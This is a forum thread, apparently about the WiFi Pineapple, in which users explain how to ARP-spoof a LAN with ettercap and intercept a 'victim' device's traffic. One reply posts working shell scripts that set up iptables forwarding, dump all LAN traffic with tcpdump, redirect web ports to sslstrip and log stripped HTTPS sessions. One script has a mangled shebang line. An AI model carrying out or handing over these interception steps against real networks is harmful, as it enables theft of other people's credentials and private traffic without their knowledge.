How to do ARP Spoofing on Pineapple IV 2.8.x by using ettercap?

billcyz

I want to use ettercap on Pineapple IV to do mitm attack, but I don't now how to set it up. I've connected my laptop to my Pineapple by Ethernet cable, with no Internet access, when I want to scan the MAC address of the LAN network, I am confused about which interface has to be used, br-lan or wlan0 ?

My plan is simple, I want to make Pineapple to be the fake gateway of my LAN network by using ettercap, then my victim device connects to the LAN network, and the traffic will be send to fake gateway by ARP Spoofing. So can anyone tell me how to use ettercap on Pineapple?

• 4 weeks later...

You shouldn't have to do much if you're already in the interface.

Which interface are you using for ppl to connect to, wlan0 ? That's what you'll select then... put in two specific targets (Target 1 = the router, Target 2 = the victim), or leave them both blank to ARP the whole network.

Then click 'start'

Then open another tab and start something else like urlspoof, sslstrip, etc.

I too am slightly confused. It sounds like you're using the two ethernet ports and using this as kind of a "monkey in the middle" on the LAN only. I've done this before as well, and it works pretty slick, though I was just tcpdumping and sslstripping at the time (no ettercap). This should point you in the right direction though:

#Heres my Lanport.sh - this preps the two eth ports to talk to each other

#!/bin/shiptables -A FORWARD -i eth1 -o wlan0 -s 172.16.42.0 -m state --state NEW -j ACCEPT
iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
#And Heres my DumpNstripLAN.sh - dumps all the traffic and strips the SSL.
#/bin/sh
tcpdump -i br-lan -w /usb/cap.pcap -n net 172.16.42.0/24 &
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
sslstrip -w /usb/sslstrip.log &
Hope this helps ya out billycz!
telot
Edited by telot